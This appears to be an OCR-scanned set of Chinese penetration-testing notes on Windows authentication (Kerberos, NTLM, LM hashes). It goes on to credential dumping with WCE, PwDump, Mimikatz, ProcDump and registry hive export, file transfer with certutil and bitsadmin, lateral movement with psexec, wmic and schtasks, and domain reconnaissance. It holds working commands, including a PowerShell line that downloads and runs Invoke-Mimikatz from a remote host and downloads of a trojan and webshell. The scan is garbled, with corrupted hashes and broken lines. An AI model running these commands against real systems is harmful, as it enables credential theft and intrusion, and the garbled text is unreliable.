当 客户 端 拿 到 消息 6 中 的 Client/SS 会 话 密 钥 之 后 ， 就 可 以 向 服务 器 请 求 服务 了 ， 它 会 向 服务 器 发 送 2 


条 消息 

1. 消息 5， 用 服务 器 密 钥 加 密 的 客户 端 -服务 器 票据 

2. 新 的 Authentication (包含 用 户 ID 和 时 间 戳 ) ， 使 用 Client/SS 会 话 密 钥 进行 加 密 。 
服务 器 


。 当 服 务 器 收 到 消息 后 ， 会 用 自己 的 服务 器 密 钥 解密 消息 7 得 到 客户 端 -服务 器 票据 ， 既 得 到 了 
Client/SS 密 钥 。 
。 再 使 用 得 到 的 ClientlSS 密 钥 解密 消息 8， 得 到 Authentication， 获 取 其 中 的 用 户 ID 和 时 间 戳 。 


这 一 步 流程 完成 后 ， 客 户 端的 认证 就 可 到 确认 ， 服 务 器 就 会 给 客户 端 提供 服务 ， 向 客户 端 发 送 1 条 
消息 。 


1. 新 的 时 间 惟 ， 使 用 Client/SSs 会 话 密 钥 进行 加 密 。 


第 四 步 -快乐 沟通 
客户 端 


客户 端 拿 到 消息 9 之 后 ， 用 ClientySS 会 话 密 钥 解密 ， 验 证 时 间 惟 ， 确 认 服 务 器 身份 ， 然 后 就 开始 向 
服务 器 发 送 请 求 


服务 器 
服务 器 向 客户 端 提供 相应 的 服务 


Kerberos 认 证 的 缺点 
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需要 第 三 方 机 构 认 证 ， 如 果 Kerberos 服 务 器 挂 了 ， 那 就 没 法 请 求 服务 了 ， 可 以 通过 复合 
Kerberos 服 务 器 和 缺陷 认证 来 进行 弥补 T 
时 钟 上 的 统一 ， 因 为 票据 具有 一 定 的 有 效 性 ， 机 器 间 的 时 间 一 般 不 可 以 超过 10 分 名 
DCR, LRE 


客户 端 防御 差 ， 用 户 密码 / 哈 希 也 会 被 拿 走 
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NTLM 
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LM 协 议 及 Hash 抓 取 
-、NTLM 认 证 协议 


域 的 工作 组 环境 。 主 要 有 本 地 认证 和 网 络 认 证 两 种 方式 。 


ndows 身 份 认 证 机 制 主要 有 NTLM 和 Kerberos 两 种 ， 其 中 NTLM 主 要 被 用 在 本 地 以 及 早期 工作 组 
境 ，Kerberos 主 要 用 在 域 环境 中 。 这 里 介绍 的 NTLM 认 证 是 Windows 早 期 的 认证 方式 ， 因 向 后 
容 性 而 保留 了 下 来 。NTLM 认 证 NTLM 适 用 范围 非常 广 ， 既 可 用 于 域内 的 认证 服务 ， 也 可 用 于 没 


我 们 登录 自己 的 电脑 时 ， 首 先 要 进行 身份 认证 。Windows 会 调用 winlogon_exe 进 程 (也 就 是 我 们 
常见 到 的 登录 框 ) 接收 用 户 的 密码 。 之 后 密码 会 被 传送 给 进程 lsass.exe， 该 进程 会 


一 份 明文 密码 ， 然 后 将 明文 密码 加 密 为 NTLM Hash 后 ， 与 Windows 本 地 存储 密码 的 SAM 数 据 库 










RAMA | | CR J/NTLM HASH 


d Isass.exe 
KR eux 


A 
2 网 络 认证 


d» (Challenge) /R (Response) 机 制 。 


E 26 3 86221400 192.168. 2. 

1 27 8, 862692 00192. 168.3 nM i4 
M 28 6.86312100 192,168. 

© 29 6. 89309200 192 .168. ET 192.168.3.77 SMB 252 Session Setup Andx Response 


192.168.3.144 E d ion Setup AndX Request, afia skin NEGOTIATE 
sim 


mem 
[a 
ne 
~ 
o 
[Lj 
S 


用 户 名 请 求 
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(%SystemRoot%\system32\config\SAM) 中 该 用 户 的 NTLM Hash 对 比 ， 一 致 则 登录 成 功 。 


在 域 环境 中 Windows 优 先 使 用 Kerberos 认 证 ， 但 是 也 可 以 使 用 NTLM 来 进行 认证 。 NTLM 协 议 基于 


58.3.77 Se LE ee şi del se up Andx Respor SSP. SCHEME. Error STATUS. MORE... PROCESSING REQUIRED 
2.168.3.144 SMB 434 Session Setup Andx Regu: eds dele esi AUTH, User ROOTKI T\administrator 


步骤 一 : 用 户 在 客户 端 输入 账号 和 密码 ， 客 户 端 缓存 密码 的 NTLM Hash 并 向 服务 端 发 送 明文 表示 的 


步骤 二 : 服务 端 接收 到 客户 端的 请 求 后 ， 先 生成 一 个 16 位 的 Challenge 随 机 数 ， 本 地 储存 后 将 
Challenge 以 明文 返回 给 客户 端 端 bun » 


- Simple Protected Negotiation 
= negTokentarg 
negResult: accept-incomplete (1) 
supportedmech: 1.3.6.1.4.1.311.2.2.10 (NTLMSSP - Microsoft NTLM Security Support Provider) 
responseToken: 4e544c4d53535000020000000e000e0038000000158289e2... 
- NTLM Secure service Provider 
NTLMSSP identifier: NTLMSSP 
NTLM Message Type: NTLMSSP CHALLENGE (0x00000002) 
* iai Name: ROOTKIT 





+ er e 
- version 6.2 (Build 9200); NTLM Current Revision 15 
Major version: 6 
Minor version: 2 
Build Number: 9200 
NTLM Current Revision: 15 
Native Os: windows Server 2012 Datacenter 9200 
Native LAN Manager: windows Server 2012 Datacenter 6.2 


步骤 三 : 客户 端 接收 到 Challenge 后 ， 将 NTLM Hash 对 Challenge 进 行 加 密生 成 Response， 再 将 


Response 发 送 给 服务 端 


~ Simple Protected Negotiation 
=~ negTokenTarg 
responseToken: 4e544c4d5353500003000000180018008a300000018001800... 
= NTLM Secure Service Provider 
NTLMSSP identifier: NTLMSSP 
NTLM es BYP NTEMSSP AUTH (0x00000003) 







NTLM gue chattense: EE ET EYES 
NTLM Response: 29cf042f3d7b8b123d2c3d0d896007eb9876eec5e17c3858 
Domain name: ROOTKIT 

User name: administrator 

HOSt name: PC-TORNDO-KIT 

Session coe aus UU ROCCE I 









version 5.1 (Build 2600); NTLM Current Revision 15 
Major version: 5 
Minor Version: 1 
Build Number: 2600 
NTLM Current Revision: 15 
Native OS: windows 2002 Service Pack 3 2600 
Native LAN Manager: windows 2002 5.1 
Primary Domain: 


步骤 四 : 服务 端 接收 到 客户 端 发 来 的 Response， 将 用 户 名 、 客 户 端 发 送 的 Response、 原 始 的 
Chanllenge 发 送 到 域 控制 器 (Domain Controller) 


pafe eee e+ 


步骤 五 : 域 控制 器 使 用 本 地 数据 库 (NTDS.dit) 中 保存 的 对 应 用 户 的 NTLM Hash 对 存储 的 
Challenge 进 行 加 密 ， 得 到 的 结果 与 接收 的 Response 进 行 对 比 ， 一 致 则 认证 成 功 。 然 后 将 认证 结 
返回 给 服务 端 。 


了 解 整个 过 程 可 以 发 现 ， 认 证 过 程 中 为 了 确保 安全 ， 用 户 的 明文 密码 并 没有 在 客户 端 和 服务 端 之 间 
传输 ， 取 而 代 之 的 是 NTLM Hash。 因 此 如 果 攻 击 者 得 到 了 用 户 的 NTLM Hash， 不 需要 破解 得 到 明 
文 密码 便 可 以 冒充 该 用 户 通过 身份 验证 ， 这 就 是 Hash 传 递 攻 击 (Pass The Hash). 


二 、Hash 抓 取 


Hash 传 递 攻击 的 必须 条 件 之 一 是 : 获取 用 户 的 NTLM Hash 值 ， 总 结 一 下 抓 取 Hash 的 方法 


1.WCE 
WCE 是 一 款 Hash 注 入 神器 ， 不 仅 可 以 用 于 Hash 注 入 ， 也 可 以 直接 获取 明文 或 Hash。 
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-> wce.exe -| 列 出 登录 的 会 话 和 NTLM 任 据 


c: \Documents and Settings\alee>cd “My Documents" 


c:\Documents and Settings\alee\My Documents>wce.exe -1 
WCE v1.3beta (Windows Credentials Editor) - (c) 2010.2011.2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity. 


com) 
Use -h for help. 


alee: PC-TORNDO-KIT:FOD412BD 764FFE81 AAD3SB435B51 4O4EE : 209C61 74DA4SOCAEBY22F 3FASATAEG 34 
pC-TORNDO-KIT$:ROOTKIT:00000000000000000000000000000000 : 6B21 2CSAS4DAAGAY71AC43CDD7013CA9 





> wce.exe -w 列 出 明文 密码 


c:\Documents and Settings\alee\My Documents>wce.exe -w 
WCE v1. 3beta (Windows Credentials Editor) - (c) 2010,2011, 2012 Amplia Security - by Hernan Ochoa (hernanGampliasecurity. 


com) 
Use -h for help. 


alee\PC~TORNDO-KIT: admin 
NETWORK SERUICENROOTKIT:«contains-non-printable-chars» 
PC-TORNDO-KIT$\ROOTKIT : «contains-non-printable-chars? 





2.PwDump7 
EE o ee 充 中 用 户 的 密码 Hash 


microsoft Landon XP 【版 本 5.1.2600] 
(C) 版 权 所 有 1985-2001 Microsoft Corp. 


C:\Documents and Settings\alee>cd C:\Documents and Settings\alee\My Documents\PwDump? 
C:\Documents and Settings\alee\My Documents\PwDump?>PwDump7 . exe 


: Andres Tarasco Acuna 
: http: //www.514.es 


Administrator :500:FOD412BD764FFES1 AAD3B435B51 4O4EE : 209C61 74DAYSOCAEBY22F SFASATAEGSS: : : 
Guest :501:NO PASSWORDxxxxxxxxxxxxxxxxxxxxx: NO PaSSIORDxo000000000000000000€ 1: : 
HelpAssistant : 1000: 90B3926958E2E82EGF 1FDFA7ZASBAYNDO : D284D93 7099699 7CDG 1 G84O35EC5909D: : : 
SUPPORT 388945a0:1002:N0 PASSWORDxxxxxxxxxxxxxxxxxxxxx :; 6CCBZ234F 86E01 992086471 7CEISEC263: : : 
alee: 1003:FOD412BD764FFE81 AADSBYS5B51404EE : 209C61 74DAYSOCAEBY22F 3FASATAEG3H: : : 





3.QuarkPwDump 


Quarks PwDump 是 一 款 开放 源 代码 的 Windows 用 户 凭 据 提 取 工 具 ， 它 可 以 抓 取 Windows 平 台 下 多 
种 类 型 的 用 户 凭 据 ， 包 括 : 本 地 帐户 、 域 帐户 、 缓 存 的 域 帐户 和 Bitlocker。 


--> QuarkPwDump.exe -dhl 


pgs 
BEA E y Ry DTE 
PRATEN UN 
PAPE E E O A ERS 


Nono Ny’ NM M 
v0.2b -«(QuarksLab)»- 


[+] Setting BACKUP and RESTORE priuileges...[0K] 
[+] Parsing SAM registry hive...[O0K] 

[+] BOOTKEV retrieving... [OK 

BOOTKEY = 620424EQB90F02333DFE7068984024FD 


BEGIN DUMP 
alee: 1603: FOD41 2BD764FFES81 AAD3B435B51 4O4EE : 209061 74DAYSOCAEBYZ2F 3FASATAEGSH: : : 
SUPPORT_388945a0: 1002: AAD3B435B51 4O4EEAADSB435B51 4O4EE : GCCB234F 86E019920B6471 7CE15EC263: : : 
HelpAssistant : 1000: SOB3926958E2E82E6F 1 FDFA?2ASBAYDG : D284D9370996997CD61684035EC5909D: : : 
Guest :501 : AAD3B435B51 4O4EEAADSB435B51 4OHEE : 31D6CFEOD160E931B73C59D7E0CO89CO: : : 
Administrator :500:F0D412BD764FFE81AAD3B435B851404EE : 209C61 74DQH90CAEBH22F 3FASATAEGSH: : : 

END DUMP 


5 dumped accounts 
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4.Mimikatz 
(1) 直接 读 取 
--> privilege::debug 


--> sekuelsa::logonPasswords 


mimikatz # privilege: :debug 
Privilege '20' OK 


mimikatz # sekurlsa::logonpasswords 


: @ ; 308265 (89868006: 8904b429) 
Interactive from 1 


Logon Server 


: C 
Logon Time - 2019/11/1 15:867:39 
SID 


: $-1-5-21-691086751-2126115182-1166141280-1000 
msu : 
[000000031 Primary 


* Username : ryan 
* Domain : ryan-PC 
: c8347?dild8e48c 7aad3b435b51484e6 
> 1439407619651 746ba865d8f dadal F89 
:- T9ebcádaa32880629d5 79cb854c2615203ebc23e 
ispkg : 
* Username: ryan 
* Domain : ryan-PC 
* Password : 951018 
wdigest : 
* Username : 


(2) 非 交互 式 读 取 





--> mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt 


C: \Users\ryan\Documents\mimikatz>mimikatz.exe "privilege::debug" "sekurlsa::1o9go 
npasswords" > pssword.txt 








es 


HF Y 


mimidrv.sys 
C) mimikatz 
mimilib.dil 


pssword 
5.Powershell 
使 用 PowerSploit-master 中 的 脚本 加 载 mimikatz 模 块 抓 取 hash， 无 文件 落地 
使 用 本 地 脚本 
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-> powershell -exec bypass "import-module AInvoke-Mimikatz.ps1;Invoke-Mimikatz" 


c: \Users\ryan\Documents>powershell -exec bypass "import-modole .XInvoke-Mimikatz 
ps1; Invoke-Mimikatz" 


HHRHH. mimikatz 2.1 (x64) built on Nou 10 2016 15:31:14 
HH ^ HH. “A La Uie. A L'Amour" 
HH / \ BR /x x x 
## \ / ## Benjamin DELPY ‘gentilkiwi ( benjamin@gentilkiwi.com ) 
‘HH U BRE http: //blog.gentilkiwi.com/mimikatz (oe.eo) 


ELLLLA 3 with 20 modules * x x/ 


nimikatz(powershell) # sekurlsa: : logonpasswords 


Authentication Id : 0 ; 308265 (00000000: 0004b429) 
Session : Interactive from 1 
User Name : ryan 
i : ryan-PC 
: RYAN-PC 
: 2019/11/1 15:07:39 
: $-1-5-21-691086751-2126115182-1166141280-1000 


[90000003] Primary 

x Username : ryan 

x Domain : rgan-PC 

x LM : €83477d11d8e40c faad3b435b51404ee 
x NTLM : 143407619651 746ba065d8fdaSalf09 


加 载 远程 服务 器 脚本 


--> powershell IEX (New-Object 
Net. WebClient).DownloadString( 
^; Invoke-Mimikatz 


C:\Users\ryan>powershell IEX (New-Object Net.llebClient).DownloadString( 'https:// 
raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke- 
Mimikatz.ps1'); Invoke-Mimikatz 


HHAHH . mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14 
LINE "A La Uie, A L'Amour” 
## / \ HR /x x x 
## \ / ## Benjamin DELPY ‘gentilkiwi ( benjamin@gentilkiwi.com ) 
“HH u HH’ http: //blog.gentilkiwi.com/mimikatz (oe. eo) 
ELLLLE with 20 modules x x x/ 


nimikatz(powershell) # sekurlsa: : logonpasswords 


Authentication Id : O ; 308265 (00000000: 0004b429) 
Session : Interactive from 1 
User Name : ryan 
Domain : ryan-PC 
Logon Server : RYAN-PC 
i : 2019/11/1 15:07:39 
: $-1-5-21-691086751-2126115182-1166141280-1000 


[00000003] Primary 

x Username : ryan 

x Domain : ryan-PC 

x LM : €83477d11d8e40c faad3b435b5 1404ee 
6.ProcDump + mimikatz 


ProcDump 导 出 数据 本 地 分 析 , 工 具 是 微软 官方 提供 的 ， 最 大 的 优势 就 是 免 杀 。 





--> procdump.exe -accepteula -ma Isass.exe Isass.dmp 
C:\Users\ryan\Documents\Procdump>procdump.exe -accepteula -ma lsass.exe lsass dg 
P 


ProcDump v9.0 - Sysinternals process dump utility 
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards 
Sysinternals - www.sysinternals.com 


[16:51:00] Dump 1 initiated: C:\Users\ryan\Documents\Procdump\lsass.dmp 
[16:51:03] Dump 1 writing: Estimated dump file.size is 30 MB. 
[16:51:04] Dump 1 complete: 30 MB written in 4.4 seconds 

[16:51:05] Dump count reached. 





本 地 磁盘 (C:) ^ BE ， ryan » 我 的 文档 » Procdump wld 


ur 
fi 


xz 


Eula 
Isass.dmp 


procdump 


--» sekurlsa::minidump Isass.dmp 


--> sekurlsa::logonpasswords 


mimikatz # sekurlsa::minidump lsass.dmp 
Switch to MINIDUMP : '"Isass.dmp' 


mimikatz # sekurlsa::logonpasswords 
Opening : 'lsass.dmp' file for minidump... 


Authentication Id : 0 ; 308265 (00000000:0004b429) 

Session ; Aue from 1 

User Name : ryan 

Domain : ryan-PC 

Logon Server : RYAN-PC 

Logon Time : 2019/117/1 15:07:39 

SID > $-1-5-21-691086 751-2126115182-1166141288-1868 


ms 
000000031 Primary 
* Username : ryan 
* Domain : ryan-PC 
LM : 6834 7 ?d11d8e40c 7aad3b435b51404ee 
NTLH : 143407f619651746ba065d8fda5a1f09 
2n > 79ebcádaa328806294d579cb844c2615203ebc23e 
tspkg : 
* Username : ryan 
* Domain : ryan-PC 
* Password : 951018 


7. 注 册 表 导出 


--> reg save HKLM\SYSTEM system.hiv 





--> reg save HKLM\SAM sam.hiv 


--> reg save hklm\security security.hiv 


(1) 使 用 mimikatz 读 取 
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3 mimikatz: lsadump::sam /system:system.hiv /sam:sam.hiv 


^ HH. "A La Vie, A L'Amour” - (oe.eo) 
! \ HH 7x«* Benjamin DELPY 'gentilkiwi' ( benjamin@gentilkiwi.com ) 
a VZ BH > http:/7blog.gentilkiwi.com/mimikatz 
"TES Vincent LE TOUM ( vincent. letoux@gmail.com ) 
HHRHH? > http://pingcastle.com / http://mysmartlogon.com | ***/ 


mikatz # Isadump::sam /system:system. hive /sam:sam.hive 
in : RYAN-PC 

icKey : b2e6a968464510ca903fücf570&4defb 7b 

ca] SID + S-1-5-21-691086751-2126115182-11661412980 


HKey : 974d30286433981480c8d 7581452942927 
[D : 000001f4 (500) 


: Administrator 


Hash NTLM: 31d6cfeUd16ae931b73c59d7e0c089c0 


iD) : 000001f5 (501) 
er : Guest 


ID : 000003e8 (1000) 
User : ryan 


Hash NTLM: 143407f619651 746ba065d8f daSalfO9 





mikatz # a 
(2) 使 用 mpacket 套 件 中 的 secretsdump.py 脚本 读 取 


--> python /root/impacket/examples/secretsdump.py - sam sam.hiv - security security.hiv 
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Windows 认 证 原理 之 NTLM 篇 


Windows 密 码 


密码 存储 于 SAM 文件 中 路 径 : `%systemroot%\system32\config\SAM 





> 此 电脑 ， 本 地 磁盘 (C) > Windows > System32 > config vu 





1 Journal 
常规 we ”详细 信息 以 前 的 版 本 i RegBack 
i systemprofile 
SAM | TxR 
| 8BI 12K8 
文件 BCD-Template tkB 
fs if COMPONENTS 
描述 : SAM DEFAULT 
| DRIVERS 
TOR: CAWindowsVSystem32 config EUM 
i SAM 
大 小 : 64.0 KB (65,536 5715) | SECURITY 
占用 空间 : 64.0 KB (65,536 515) SOFTWARE 
SYSTEM 2 302142 2 kt 
VSMIDK 2019/10/24 22.06 KB 
创建 时 间 2019 年 3 月 19 日 ，12:37:22 
修改 时 间 : 2019 年 10 月 30 上 日 ，21:42:15 
orgia: 2019410306, 21:42:15 
mn: CRER) Toit (H) E(D)... 


当 我 们 登录 系统 的 时 候 ,系统 会 自动 地 读 取 SAM 文 件 中 的 "密码 "与 我 们 输入 的 “密码 "进行 比 对 ， 如果 | 






NTLM (NT LAN Manger) 


。 NTLMHash 是 支持 Net NTLM 认 证 协议 及 本 地 认证 过 程 中 的 一 个 重要 参与 物 ， 其 长 度 为 32 位 ， 
由 数字 与 字母 组 成 。 

。 Windows 本 身 不 存储 用 户 的 明文 密码 ， 它 会 将 用 户 的 明文 密码 经 过 加 密 算法 后 存储 在 SAM 数 
据 库 中 。 

。 当 用 户 登 录 时 ， 将 用 户 输 入 的 明文 密码 也 加 密 成 NTLMHash， 与 SAM 数 据 库 中 的 NTLMHash 
进行 比较 。NTLMHash 的 前 身 是 LM Hash， 目 前 基本 淘汰 。 


LM Hash 
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APES 










Bali 
| 
转换 成 大 写 窗 码 
用 0 补足 到 14 字 他 
| 
S4= TBs 
- aaa 
2 组 8Byte 字 符 
作为 DESKey 加 密 一 串 字 答 
| 


LM Hash 
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m —À 


| password | 


hex 16325888 ps 


| 
j 


! 61646d696a 
Unicode 


| 610064006d0069006e00 - 


MD4 
| 


| adminz »209c6174da490caeb422f3fa5a7ae634 | 


本 地 认证 流程 


e Windows LogonProcess ( 即 winlogon.exe), Windows NT 用 户 登陆 程序 ， 用 于 管理 用 户 登 
录 和 退出 。 
。 LSASS 用 于 微软 Windows 系 统 的 安全 机 制 。 它 用 于 本 地 安全 和 登陆 策略 。 
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winlogon.exe `| 
m 


Isass.exe 





MBSR ENTLM Hash, 读 取 SAM 数 据 诺 与 用 户 名 ,比较 





比较 结果 框 同 — 
| ! 
User sid 与 Group SID 发 送 给 winlogon,exe, 准 备 登陆 界面 登录 失败 | 


1453 


NTLM v1 和 v2 的 区 别 


NTLM v1 与 NTLM v2 最 显著 的 区 别 就 是 challenge 与 加 密 算法 不 同 ， 共同 点 就 是 加 密 的 原料 都 
是 NTLM Hash, 

NTLM v1 的 Challenge 有 8 位 ，NTLM v2 的 Challenge 为 16 位 。 

NTLM v1 的 主要 加 密 算法 是 3DES，NTLM v2 的 主要 加 密 算法 是 HMAC-MD5。 
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内 网 命令 行 渗透 笔记 
内 网 命令 行 上 传 文件 ， 下 载 文件 


文件 上 传 : 
1. ipc 连 接 后 copy 


user.txt \ . C AA [ois 
user.txt ^ : .3.21c$ 


| file(s) copied. 


文件 下 载 : 
1. 建立 ipc 连 接 后 copy 
copy N10.33.7.75c$user.txt user.txt 


N10.33.7.75c$user.txt user.txt 
| file(s) copied. 


1. bitsadmin 
bitsadmin /transfer n http://baidu.com/ .exe C: estcmd.exe 
B IER: C:\Windows\system32\cmd.exe EN XL 


DISPLAY: ^n^ TYPE: DOWNLOAD STATE: TRANSFERRED 
PRIORITY: NORMAL PILES: 1 ^ 1 BYTES: 14336 / 14336 (180) 
Transfer complete. 


C= \test> 
- 


(vj IR(T) ME 





1. certutil 
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Ro» SERE > test 


(1) 保存 在 当前 路 径 ， 文 件 名 称 和 下 载 文件 名 称 相 同 
certutil -urlcache  -split -f https://www.baidu.com/webshell/dama.txt 
(2) 保存 在 当前 路 径 ， 指 定 保存 文件 名 称 


certutil -urlcache -split -f http://baidu.com/muma.exe ma.exe 


8400 4 BERS 
CortÜtil: -URLG fi 








1. powershell 下 载 并 执行 
powershell ( System.Net.WebClient).DownloadFile( 


powershell -exec bypass -c ( System.Net.WebClient).DownloadFile( 
) 


win10 可 以 win7 不 行 
powershell wget "http: iid id tfi fuck.exe 





1. ftp FAX cmd code: 


open ` E > ftp.txt 
ftp»» ftp.txt 
Din >> fp- CXE 
GET eXe Z> CDECXE 
然后 ftp -s:ftp.txt 


linux 系 统 下 : 
wget http://baidu.com/cmd.exe 


curl -o dodoi.jpg http:www.linux.com/dodoi.JPG 
curl -o dodoi.jpg http:www.linux.com/dodoi.JPG 


上 传 文件 ，curl 不 仅仅 可 以 下 载 文件 ， 还 可 以 上 传 文件 。 通 过 内 置 option:-T 来 实现 curl -T 
dodo1.JPG -u 用 户 名 :密码 ftp://www.linux.com/img/ 
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cur1 跟 wget 有 很 多 高 级 用 法 ， 大 伙 可 以 去 拓展 了 解 下 


这 里 只 介绍 几 种 常用 的 方式 ， 当 然 还 有 很 多 很 多 种 
### IPC NET USE， 查 看 目录 ， 前 提 条 件 


net use: 查看 现 有 ipc 连 接 


``cmd 

net use \192.168.3.21ipc$ "Admini2345" /user:Administrator 
net use \192.168.3.21 /u:godadministrator Admini2345 

net use \192.168.3.21 "Admini2345" /user:godadministrator 





内 网 命令 行 远程 主机 执行 命令 (wmic, pesxec. at. schtasks, 


- wmiexec.vbs) 


at&schtasks 计 划 任 务 方式 执行 程序 。 


条 件 : 启动 Task Scheduler 服 务 


SCHTASKS 用 法 : 


SCHTASKS /Create /S 192. PCM /U administrator /P Admini2345 /SC ONCE /TN PS 


schtasks /create /tn 定时 运行 /tr "calc" /sc daily /st 


远程 创建 ; 

Schtasks /create /s : "ao /U administrator /P Admini2345 /sc daily /ru s 
执行 : 

schtasks /run /s te /U administrator /P Admin12345 /tn Updateservice 


badmin>SCHTASKS /Create /S 192.168.3.21 /U administrator /P Admin 
ST 10:17 


TH PSRemoting-Taskl 已 经 存在 。 


PRICES “PSRemoting-Task1”. 
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LACLULC 





Post data 





Riv dCookies" fC ice 't Windows [ 6.1. 7681) INO 
à «c» 2909 Microsoft Corporation. ifEPUBT 





c: \Python2?\sqimap>cma 
ni oft Windows 上 [qo a 
| soft Corporation; 


te /tn í f /tr “calc” /se daily /st 10:36 


C: NPython27ssqlnap? 





at 用 法 : at \192.168.3.21 16:16 "c:fuck.exe" 


一 般 步骤 : 
use N ; vids "Admini2345" /user:godadministrator 
N 
c:fuck.exe \ : .3.21c$fuck.exe 
\192.168.3. 216 "cifuck,exe"( 有 时 任务 显示 执行 了 ， 但 是 没 反应 ， 自 行 判断 有 无 防护 拦截 
> 
psexec 
PsTools 工 具 之 一 ， 在 指定 的 一 台 或 多 全 计算机 上 运行 应 用 程序 条 件 条 件 : 需要 开放 ADMIN$ 共 享 
PsExec.exe \ : Ds /accepteula -u godadministrator -p Admini2345 
PsExec.exe \ ; Ws /accepteula -u godadministrator -p Admini2345 -c "c: 
PsEXec.exe \ A ded /accepteula -u godadministrator -p Admini2345 -h /C 
> 
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-\test>PsExecl. exe (X192. 168. 3. 31 /accepteula -u god\administrator -p Adminl2345 cmd 


sExec. v1.98 ~ Execute processes remotely 
‘opyright (C) 2001-2010 Mark Russinovich 
ysinternals — www.sysinternals. com 


crosoft Windows [版 本 6.1. 7601] 
i 权 所 有 (c). 2009 Microsoft Corporation. 保留 所 有 权利 。 


".\Windows\system32>whoami 
od\administrator 


:\Windows\system32> 


:\test PsExecl. exe \\192. 168. 3.31 /accepteula -u god\webadmin -p admin!@=45 -h cmd /c “ipconfig” 


sExec v1.98 - Execute processes remotely 
pyright (C) 2001-2010 Mark Russinovich 
vsinternals - www. sysinternals. com 


Nindows IP 配置 


人 太 网 适配器 -本 地 连接 .2: 


连接 特定 的 DNS BA. E 
本 地 链接 IPv6 地 址 . 2 . . .. . . : fe80::bcal:c6a3:7331:149c814 
IPvd Hühb o ie os ey erg Te TOOT BRE DE OT 
FG RR a eo :255.255:255.0 
默认 网 关 iesu fofeB0:-1914 
192. 168. 2. 1 


外 太 网 适配器 本 地 连接 : 


WMIC 


功能 强大 ， 可 做 系统 管理 、 远 程 主机 信息 获取 条 件 : 启动 WMI 服 务 ， 开 放 135 端 口 本 地 安全 策略 的 
“网 络 访问 : 本 地 帐户 的 共享 和 安全 模式 "应 设 为 "经 典 -本 地 用 户 以 自己 的 身份 验证 ” 


wmic /node: i eds /user:god/administrator /password:Admini2345 process 


wmic /node: ; ds /user:god/administrator /password:Admin12345 process 


2SMtestVexchange-mailbox-export-masterVexchange-mailbox-export-master?wmic /node:192.168.23.21 /user: 
ord:Adminl2345 process call create “cmd.exe /c echo 123>c:/1. txt” 

Executing (Win32_Process)->Create() ”一 一 一 

Method execution successful. 
Jut Parameters: 

instance of | PARAMETERS 


ProcessId - 6540; 
ReturnValue - 0; 





然后 看 回 192.168.3.21 成 功 生成 1.txt 


wmiexec 


使 用 VBS 脚 本 调用 WMI 来 模拟 psexec 的 功能 ， 基 本 上 psexec 能 用 的 地 方 ， 这 个 脚本 也 能 够 使 用 。 条 
ft: 启动 WMI 服 务 ， 开 放 135 端 口 本 地 安全 策略 的 * 网 络 访问 : 本 地 帐户 的 共享 和 安全 模式 "应 设 为 
“经 典 -本 地 用 户 以 自己 的 身份 验证 ” 


cscript.exe wmiexec.vbs / ; 43, administrator Admin12345 " >C 


执行 成 功 后 如 下 图 


ENC: \Windows\system32\cad. exe à "n 
$$$\ $33.03 $ $$ $$ 3$ 
$$$$\ $$$$ | $ | N99 N93) 5.099 
$$N$$5.9$:$$ i $$$$$\ \$S$$$  / $$$$S\ 
$3. NSSS $5 oue 254559 eo 713 
SSAA $$. ] $$ $9 7 X69 N85 $$ $$\ 
$ \/ $$ 1$$$$$9V.$$99$399XV $$ / $$ $998999999\ \$SSSS$ 
| NGBRN ME A Ne s est AEN 
vl. Obeta By. Twilight 
: Target -> 192.168. 3. 21 
: Connecting... 
: Login —> OK 
: Result File -> C:\wmi. dll 
: Share created sucess. 
: Share Name -> WMI SHARE 
ee ohare. Path? Gay 


192. 168.3.21 >> ipconfig >c: \ipconfig. txt 


dows IP 配置 


网 适配器 本 地 连接 : 


连接 特定 的 -DNS BRI ..... : 
本 地 链接 IPvo 地 址 : fe80::dce0:4b54:544:639911 
: 192. 168. 3. 21 





域 信 息 收集 及 域 控 定 位 
域 信息 收集 : 
。 net view 显示 当前 域内 主机 
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NFILESERV 
\JACK - PC 
\MARY - PC 
\OWA2010CN-GOD 
\WEBSERVER 


。 net view /domain 显示 全 部 域 

e net view /domain:god.org 显示 指定 域内 主机 信息 

e net view \OWA2010CN-GOD 显示 指定 机 器 的 共享 资源 

e echo %logonserver% // 查 看 登陆 到 这 合 服务 器 的 计算 机 名 
e net group "domain admins" /domain /获得 域 管理 员 列 表 
。 arp -a // 列 出 本 网 段 内 所 有 活跃 的 iP 地 址 

e route print // 输 出 网 段 


。 查看 是 否 支 持 posershell if defined PSModulePath (echo yes) else (echo no) 


。 net user /domain // 获 得 所 有 域 用 户 列表 

。 nltest /domain_trusts // 获 取 域 信任 信息 

e net user domain-admin /domain // 查 看 管理 员 登 陆 时 间 ， 密 码 过 期 时 间 ， 是 否 有 登陆 脚本 ， 组 
分 配 等 信息 

net config Workstation /查询 机 器 属于 哪个 域 

net time /domian // 查 询 主 域 服务 器 的 时 间 

nbtstat -A 192.168.3.31 通过 IP 查 询 计算 机 名 和 所 在 域 

ping -a 192.168.3.21 返回 主机 名 


C:\Users\mary. GOD>nbtstat -A 1199 168. 3. 3 


if 


本 地 连接 : 
节点 IP bhk: 1192.168.3 25] yah ID: 


NetBIOS 远程 计算 机 名 称 表 


WEBSERVER | 
GOD 
WEBSERVER 


MAC 地 址 = 00-0C-29-C4-91-52 





还 可 以 导入 powersploit 的 PowerView.ps1 模 块 执行 ， 获 取 整 个 域 的 计算 机 列表 及 IP 
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import-module .PowerView.psi 
Get-DNSRecord -ZoneName god.org 


: 3667110 
: 2019/5/6 6:00:00 
+ 192. 168. 3. 21 


name ; owa2010cn-god 


distinguishedname : DC=owa2010cn~god, DC=god. org, CN=MicrosoftDNS, DC-DomainDnsZones, DC=god, DC=org 
unma dO 
(92 8:30:56 
1 10:40:30 


RecordType 
UpdatedAtSerial 


: [static] 
1:192. 168. 3. 21 





定位 域 控 : net group "domain controllers" /domain # 查 看 域 控制 器 列表 


OWA2010CN-GOD$ 
命令 成 功 完成 。 


net time /domain 


NOWA2010CN-God.god.org 的 当前 时 间 是 2019/7/8 17:21:15 
然后 ping OWA2010CN-God.god.org 即 可 得 到 域 控 IP 


nltest /dclist:god.org (god.org) 为 域 
获得 域 “<god .org” 中 DC AIZIZ(M”\OWA2010CN-God.god.org”#), 


OWA2010CN-God.god.org [PDC] [DS] 站 点 : Default-First-Site-Name 
此 命令 成 功 完成 


ping 域 的 名 称 
